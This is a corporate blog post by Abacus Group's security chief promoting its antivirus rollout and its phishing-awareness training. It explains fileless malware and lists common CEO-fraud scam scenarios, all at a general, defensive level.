By Dave Parsons, Chief Information Security Officer at Abacus Group
Abacus Group recently implemented next-generation antivirus (NGAV) software on the full client and staff workstation fleet attached to our private cloud platform. The NGAV software monitors the processes spawned by the operating system, making decisions to determine if processes are malicious.
Risk of Social Engineering
Fileless malware comprises more than 50% of all current workstation attacks. A fileless attack does not depend upon the installation of malicious code on a victim’s machine. Instead, the attack subverts legitimate tools in a browser or operating system and turns them against the user. This form of attack is attractive as it’s relatively stealthy and difficult for legacy antivirus systems to detect. Basic system hygiene, such as patching and least privilege policy is important; however, more important is managing staff understanding of the risks at hand. Most fileless malware is distributed by social engineering, i.e. phishing/spear-fishing, malvertising, watering holes and similar attacks.
Abacus Group provides a multi-layered, defense in depth cybersecurity strategy based on people, process and technology. The user community is the first line of defense in every organization, and consistent staff education is a cornerstone in every healthy IT security program. Our AbacusFLEX™ IT-as-a-Service solution includes an annual cybersecurity awareness education program designed to provide employees with cybersecurity training, an understanding of common social engineering threats, and the steps required to avoid exploitation.
Abacus Group has seen a vast improvement in the identification and reporting of phishing attempts since the implementation of a web-based training program in 2017. Our cybersecurity education program, provided by our training partner KnowBe4, inspires our clients to perform exceptionally well compared to industry benchmark data:
AbacusFLEX Client phish-prone % = 0.35%
Industry phish-prone % = 13.10%*
* Based on 6MM worldwide users of KnowBe4 training videos and phish testing.
Phishing: a scam by which an Internet user is duped (as by a deceptive e-mail message) into revealing personal or confidential information which the scammer can use illicitly (source: www.merriam-webster.com)
According to KnowBe4’s 2018 Threat Impact and Endpoint Protection Report, “organizations continually performing security awareness training, as well as periodically testing employees with phishing emails saw the lowest percentage of ransomware attacks (8%) and malware-based external attacks (14%) in the last 12 months.”
AbacusFLEX Cybersecurity Awareness Education Program
This is why we offer our clients a multi-phase cybersecurity awareness education program, which includes the following components:
- Cybersecurity Training: An on-demand interactive and self-paced training video is sent to all users and taken at their convenience over a designated two-week period. The 15-minute video includes common traps, demos and scenario-based exercises.
- Phishing Test: A phishing test is sent out randomly to each user over a two-week period. The test includes a fully automated phishing attack that leverages commonly used tactics and educational landing pages.
- Compliance Reporting: Training and testing metrics for each client resides within their Abacus Client Portal, providing compliance officers with current and historic reporting showing users’ progress and completion shortly after the training period ends.
One of the most common results of social engineering scams that we’re seeing these days is referred to as CEO Fraud.
“CEO Fraud is a scam in which cybercriminals spoof company email accounts and impersonate executives to try and fool an employee in accounting or HR into executing unauthorized wire transfers, or sending out confidential tax information. In the time period from January 2015 to June 2016, the FBI reported a 1300% rise in losses from this type of fraud. Most victims are in the US (all 50 states), but companies in 100 other countries have also reported incidents. While the fraudulent transfers have been sent to 79 countries, most end up in China and Hong Kong. Unless the fraud is spotted within 24 hours, the chances of recovery are small.” (source: KnowBe4)
KnowBe4 has outlined 5 common attack scenarios for CEO Fraud:
- Business working with a foreign supplier: This scam takes advantage of a long-standing wire-transfer relationship with a supplier, but asks for the funds to be sent to a different account.
- Business receiving or initiating a wire transfer request: By compromising and/or spoofing the email accounts of top executives, another employee receives a message to transfer funds somewhere, or a financial institution receives a request from the company to send funds to another account. These requests appear genuine as they come from the correct email address.
- Business contacts receiving fraudulent correspondence: By taking over an employee’s email account and sending invoices out to company suppliers, money is transferred to bogus accounts.
- Executive and attorney impersonation: The fraudsters pretend to be lawyers or executives dealing with confidential and time-sensitive matters.
- Data theft: Fraudulent emails request either all wage or tax statement (W-2) forms or a company list of personally identifiable information (PII). These come from compromised and/or spoofed executive email accounts and are sent to the HR department, accounts or auditing departments.
Make sure YOUR firm is protected from social engineering by mandating staff completion of annual cybersecurity training and phish testing.